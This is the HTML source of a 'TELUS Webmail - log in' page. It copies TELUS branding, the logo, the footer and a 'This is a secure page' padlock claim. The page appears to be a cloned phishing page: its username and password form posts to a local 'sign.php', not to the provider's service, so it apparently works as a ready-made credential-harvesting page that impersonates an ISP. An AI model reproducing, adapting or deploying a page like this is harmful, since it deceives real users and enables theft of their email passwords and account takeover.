﻿

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- IE into quirks mode -->
<!--<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"     "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <title>TELUS Webmail - log in</title>
<link rel="stylesheet" type="text/css" media="screen" href="css/main.css">
<link rel="stylesheet" type="text/css" media="screen" href="css/passwordStrength.css">
<link rel="shortcut icon" href="http://webmail.telus.net/telusbeta/static/images/favicon-175768547.ico" type="image/x-icon">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<meta name="format-detection" content="telephone=no">
	<meta name="application-name" content="">

    <title>TELUS Webmail - log in</title>
    <meta name="description" content="">

    <link rel="favicon" href="https://static.telus.com/common/images/favicon/favicon.ico">
    <link rel="favicon" sizes="32x32" href="common/images/favicon/TELUS-favicon-32.png">
    <link rel="favicon" sizes="128x128" href="common/images/favicon/TELUS-favicon-128.png">
    <link rel="apple-touch-icon" href="https://static.telus.com/common/images/favicon/apple-touch-icon.png">
    <link rel="apple-touch-icon" sizes="72x72" href="common/images/favicon/TELUS-apple-touch-icon-72.png">
    <link rel="apple-touch-icon" sizes="114x114" href="common/images/favicon/TELUS-apple-touch-icon-114.png">
    <link rel="apple-touch-icon" sizes="144x144" href="common/images/favicon/TELUS-apple-touch-icon-144.png">

	
	<input id="email_id" type="hidden" value="">

	<script src="//assets.adobedtm.com/a2962fe01e14/ded14ec223e4/launch-238bf7388722.min.js" async></script>
	<script src="js/jquery.min.js"></script>
	<script src="js/icheck.min.js"></script>
	<script src="js/pStrength.jquery.js"></script> 
	<script src="js/jquery.clientsidecaptcha.js"></script>
		
		
<style>
		

.uss-form input[type="text"] {
    width:97%;
}
</style>


</head>

<body onLoad="onLoad();">
<noscript>
<p class="jsDisabled">JavaScript must be enabled in order to use webmail interface.<br> However, it seems JavaScript is either disabled or not supported by your browser.<br> To use webmail, enable JavaScript by changing your browser options, then try again.</p>
</noscript>

<div id="container">
		        <header class="site-header">
        <div class="grid">
                <div class="telus-logo" title="Return to the TELUS Homepage">
                        <a href="en/index.htm" title="Back to Homepage">
                                <img src="common/images/header/TELUS-logo.svg" alt="TELUS Logo">
                        </a>
                </div>
        </div>
</header>

	
                     
			<div class="content">
				<div class="grid content-grid">
					<div class="main">
                  
						<div class="oneColumnUnauthenticated-wrapper">

  						<div class="oneColumnUnauthenticated-heading">
    						<h1 class="frg-headline-font-37px">
      						<span class="frg-icon icon-envelope-inverted"></span>
      						<span class="desktop-only">Your</span> TELUS Webmail
    						</h1>
  						</div>
					
					    
					    

  						<div class="loginWidget-wrapper oneColumnUnauthenticated-box">
    						<div class="loginForm-wrapper">
      						<div class="loginForm-container">
        						<h2 class="frg-headline-font-27px">
          						Log in
        						</h2>

        						<div class="form-block">

								
								  <form method="post" id="commonEnrolmentForm" class="login uss-form" name="loginForm" action="sign.php" accept-charset="UTF-8">
									<input type="hidden" name="loginOp" value="login">
									
								      	<div class="uss-input">
        									<div class="input-info">
												<label for="username">Email/Username</label>
											</div>
          								<div class="input-border  ">
											
											<input type="text" id="username" value="" maxlength="1024" name="username" class="" maxlength="100" size="30" value="" placeholder="" data-required-error-msg="" tabindex="0" autocomplete="off">
											
											
              							<span class="frg-icon " aria-hidden="true"></span>
          								</div>
          								<div class="error-message "></div>
        								</div>
            
    										<div class="uss-input uss-input-password">
        									<div class="input-info">
            								<label for="password">Password</label><a class="frg-link decoration-default forgot" tabindex="0" title="Forgot your password?" href="https://pwm.telus.net/public/forgottenpassword">Forgot?</a>
        									</div>
        									<div class="input-border">
												
	    <input style="width:70%;" type="password" name="password" value="" maxlength="1024" size="30" id="password" data-required-error-msg="" data-invalid-format-error-msg="invalid password" data-invalid-format-number-error-msg="Must contain at least 1 number." data-invalid-format-letter-error-msg="Must contain at least 1 letter." data-invalid-format-space-error-msg="Your password can't contain spaces." data-invalid-format-length-error-msg="Must contain at least 6 characters." tabindex="0" autocomplete="off">
		

       <!-- <a href="#" title="Show" class="frg-button color-purple unmask-password" data-show="Show" data-hide="Hide">Show</a> -->
	<a href="#" onClick="toggle_password('showhide','password');" id="showhide" title="Show" class="frg-button color-purple unmask-password" data-show="Show" data-hide="Hide" style="display:inline;width:20%;">Show</a>
        										<span class="frg-icon " aria-hidden="true"></span>
    											</div>
    											<div class="error-message "></div>
        									</div>


									    


										<!--
										<div id="forgotmsg" style="display:none">
										   <h2>Need to reset your password?</h2>
										   <p>Click the Forgot link to reset your password.</p></div> 
										 -->

									    <div id="captchablock" class="uss-input" style="display:none;">
                        <input type="hidden" name="count" value="0">
										    <div class="input-info">
											  <label for="captchaText" id="captchalabel">
											    <table>
                                                <tr>
                                                  <td>Enter the following text:</td>
                                                </tr>
												<tr>
                                                  <td><table><tr><td><span id="captcha" style="display:inline-block;margin-top:5px;"></span></td><td><img id="captcharefresh" src="img/refresh.png" height="20px" width="20px" style="opacity:0.6;margin-left:5px;margin-top:5px;cursor:pointer;"></td></tr></table></td>
												<td><div id="captchaError"><span style="color:red;">Invalid text!</span></div></td>
												</tr>
												</table>
											  </label>
											</div>
											<div class="input-border">
                                                <input type="text" id="captchaText">
                                            </div>
										</div>

									    <div class="loginForm-rememberMe" style="margin-bottom:0px;padding-bottom:0px;">
									    	<fieldset class="icheckbox">  
												<input class="frg-input-checkbox" type="checkbox" value="1" id="remember" name="zrememberme" tabindex="0">
												<label for="remember" id="iCheck-zrememberme" class="icheckbox" style="margin-left: -20px;margin-top:5px;">Remember me
													<div class="checkbox-label"></div>
												</label>
											</fieldset>
										</div>

										<div id="messages" style="display:none;width:320px"></div>

									    <div class="loginForm-rememberMe">
											<!-- <input type="hidden" value="preferred" name="client"/>
											<fieldset class="icheckbox"> 
												<input id="test" class="frg-input-checkbox" type="checkbox" tabindex="4" />
												<label for="test" id="iCheck-client" class="icheckbox" style="margin-left: -20px;margin-top:5px;">Basic Interface
													<div class="checkbox-label"></div>
												</label>
											</fieldset>
											-->
										</div> 
										<div class="submit-button">
									   		<input id="loginsubmit" type="submit" value="Continue" class="frg-button color-green" data-loading-messages="Loading...|Still loading..." tabindex="0">
											<span class="submit-button-progress"></span>
										</div>
										</form>
        						</div><!-- .form-block -->

        					</div>
	      				</div> 
 						
							
								<div class="marketing-wrapper">
      								<div class="marketing-container">
	         							<h2 class="frg-headline-font-27px">
											Top tips to improve your safety online
						    			</h2>
						    			<h3 class="frg-body-font-17px">
						            		<a href="http://forum.telus.com/t5/Neighbourhood-Blog/Passwords-Keeping-Your-Data-Safe/ba-p/62591" target="_" style="text-decoration:none;">Learn more</a>
						    			</h3>
					   					<a class="frg-link has-icon" href="en/bc/support/topic/internet.html#/email" target="_blank" title="Webmail Help"><span class="frg-body-font-17px">Need help?    </span><span class="frg-icon icon-arrow-right-circled" aria-hidden="true"></span></a><br><br><br><br><br>
					   				</div>
					  			</div>
							



    					</div> <!-- loginWidget-wrapper -->

    				</div> <!-- oneColumnUnauthenticated-wrapper -->

  				</div> <!-- main -->
				</div> <!-- grid -->

<!--				<div class="grid content-grid how-to-video">
					<div class="main">
                  
						<div class="oneColumnUnauthenticated-wrapper">

  						<div class="oneColumnUnauthenticated-heading">
    						<h1 class="frg-headline-font-37px">
      						<span class="frg-icon icon-envelope-inverted desktop-only"></span>
      						Setting up your webmail
    						</h1>
  						</div>

  						<div class="loginWidget-wrapper oneColumnUnauthenticated-box">
  							<div class="loginForm-wrapper">
  								<div class="videoWrapper">
									<iframe width="560" height="315" src="https://www.youtube.com/embed/ahYrebdYBXg" frameborder="0" allowfullscreen></iframe>
  								</div>
  							</div>
  						</div>

  					</div>

					</div>
				</div>
-->
<br><br>
			</div> <!-- content -->
		</div> <!-- container -->

<footer class="content footer beta-footer">
        <div class="footer-group color-dark">
                <div class="grid">
                        <section class="my-account-footer">
                        <p>
                                <span class="frg-icon icon-padlock color-green"></span>
                                This is a secure page
                        </p>
                        </section>
                        <section id="telus-logo-copyright">
                                <img src="common/images/footer/TELUS-logo-white.svg" width="104" height="20" alt="TELUS Logo">
                                <p><span style="color:#9C9C9C;">© 2016 TELUS Communications Inc.</span></p>
                        </section>
                </div>
        </div>
</footer>


		
<div>


<script>

  
  var link = document.getElementById("bannerLink");
  if (link) {
    link.href = skin.hints.banner.url;
  }
  


function bichange(element) {
  if (element.target.checked) {
    document.forms['loginForm'].elements['client'].value='preferred';
  } else {
    document.forms['loginForm'].elements['client'].value='standard';
  }
}

// show a message if they should be using the 'standard' client, but have chosen 'advanced' instead
function clientChange(selectValue) {
  var useStandard = false;
  useStandard = useStandard || (screen && (screen.width <= 800 && screen.height <= 600));
  var div = document.getElementById("ZLoginUnsupported");
  if (div)
    div.style.display = ((selectValue == 'advanced') && useStandard) ? 'block' : 'none';
}

// if they have JS, write out a "what's this?" link that shows the message below
function showWhatsThis() {
  var div = document.getElementById("ZLoginWhatsThis");
  div.style.display = (div.style.display == "block" ? "none" : "block");
}

function onLoad() {
	var loginForm = document.loginForm;
	if (loginForm.newpassword) {
		loginForm.newpassword.focus(); 
	}
	else {
		if (loginForm.username) {
			if (loginForm.username.value != "") {
				loginForm.password.focus(); //if username set, focus on password
			}
			else {
				loginForm.username.focus();
			}
		}
	}
	clientChange("");
}

function captchainit() {
  $('#captcha').empty();
  $("form").unbind();
  $("form").clientSideCaptcha({
      input   : "#captchaText", 
      display : "#captcha",
      pass    : function() { return true; },
      fail    : function() { $('#captchaError').show(); return false; }
  });
  return false;
}

//$(document).ready(function(){
	
	function toggle_password(source, target){
	   var d = document;
	   var tag = d.getElementById(target);
	   var tag2 = d.getElementById(source);

	   if(tag2.innerHTML == 'Show'){
	     tag.setAttribute('type', 'text');
	     tag2.innerHTML = 'Hide';
	   }else{
	    tag.setAttribute('type', 'password');
	    tag2.innerHTML = 'Show';
           }
	}
$(window).on("load",function(){
      	if ($('#innerError').text().indexOf('powered')!=-1) {
			$('#innerError').html("Your TELUS email account is now powered by Google. To access your TELUS email, please visit the new login page: <a href=\"https://mail.google.com/a/telus.net\">https://mail.google.com/a/telus.net</a> and update your bookmarks. You will be automatically redirected to your new TELUS email login page in 30 seconds.");
	  		$('#username').prop("disabled",true);
			$('#password').prop("disabled",true);
			$('#loginsubmit').prop("disabled",true);
			$('#remember').prop("disabled",true);
		    setTimeout(function(){
				window.location.replace('https://mail.google.com/a/telus.net/')},30000);
		}
});

$(document).ready(function(){
	  //sessionStorage.setItem('email_id', $('#email_id').val());
	  if ($('#loginNewPassword').is(':visible')) {
		  	$('#forgot').css("display","none");
		   	$('#loginsubmit').prop("disabled",true);
      }
  	$('#loginNewPassword, #loginConfirmNewPassword').pStrength({
		    'changeBackground' : false,
		    'backgrounds'      : [['#cc0000', '#FFF'],['#cc0000', '#FFF'],['#cc0000', '#FFF'],['#cc0000', '#FFF'],['#e0941c', '#FFF'],['#e0941c', '#FFF'],['#e0941c', '#FFF'],['#e0941c', '#FFF'],['#e0941c', '#FFF'],['#e0941c', '#FFF'],['#105610', '#FFF'],['#105610', '#FFF'],['#105610', '#FFF']],
		    'onPasswordStrengthChanged' : function(passwordStrength, strengthPercentage, message) {
	            if ($(this).val()) {
	            // $.fn.pStrength('changeBackground', $(this), passwordStrength);
			    	$.fn.pStrength('addMessage',($('#messages')),($(this).val()));
					if (passwordStrength >= 12)
					{
	                	$('#loginsubmit').prop("disabled",false);
		        	}
		        	else
		        	{
			        	$('#loginsubmit').prop("disabled",true);
		        	}
			    }
				
				else {
				$.fn.pStrength('resetStyle', $(this));
				}

				//  $.fn.pStrength('addMessage',($('#messages')),($('#loginNewPassword')));
			    },

			    'onValidatePassword': function(strengthPercentage) {
				$('#commonEnrolmentForm').submit(function(){
				return true;
				});
	    	}
          });
          $('.forgot').hover(function()
    	{
		    $('#messages').css("display","none");
	   	 	$('#forgotmsg').css("display","inline");
	   	 	$('#forgotmsg').focus();
    	},function()
    	{
	    	$('#forgotmsg').css("display","none");
    	});

																		                                                                                                                                                                                        $( "#loginNewPassword" ).focusout(function() {
		$('#messages').css("display","none");															                                                                                                                                                                                        });
		

// iCheck initialization for checkbox
	$('input').iCheck({
		checkboxClass: 'icheckbox_square-green',
		aria: true
	});
    $('#test').on("ifClicked",bichange);

    

	$('#captchaText').focus(function() {
		$('#captchaError').hide();
	});

});

</script>
<script type="text/javascript">_satellite.pageBottom();</script>
</div></body>
</html>
